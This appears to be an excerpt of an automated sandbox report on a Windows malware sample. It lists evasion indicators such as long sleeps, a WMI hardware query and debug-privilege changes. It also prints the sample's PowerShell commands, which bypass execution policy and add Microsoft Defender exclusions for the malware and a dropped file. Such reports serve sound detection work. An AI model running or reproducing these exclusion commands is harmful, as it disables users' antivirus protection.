              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe Memory allocated: 1210000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe Memory allocated: 1AC60000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeWindow / User API: threadDelayed 9759Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5982Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3830Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5926Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3852Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7122Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2444Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6938
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2785
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe TID: 5448Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 980Thread sleep count: 5926 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 332Thread sleep count: 3852 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep count: 7122 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep count: 2444 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: 1c8DbXc5r0.exe, 00000000.00000002.2950146492.000000001B8A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.Ser%SystemRoot%\system32\mswsock.dlldel.Discovery, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1c8DbXc5r0.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rapent.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Queries volume information: C:\Users\user\Desktop\1c8DbXc5r0.exe VolumeInformation
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
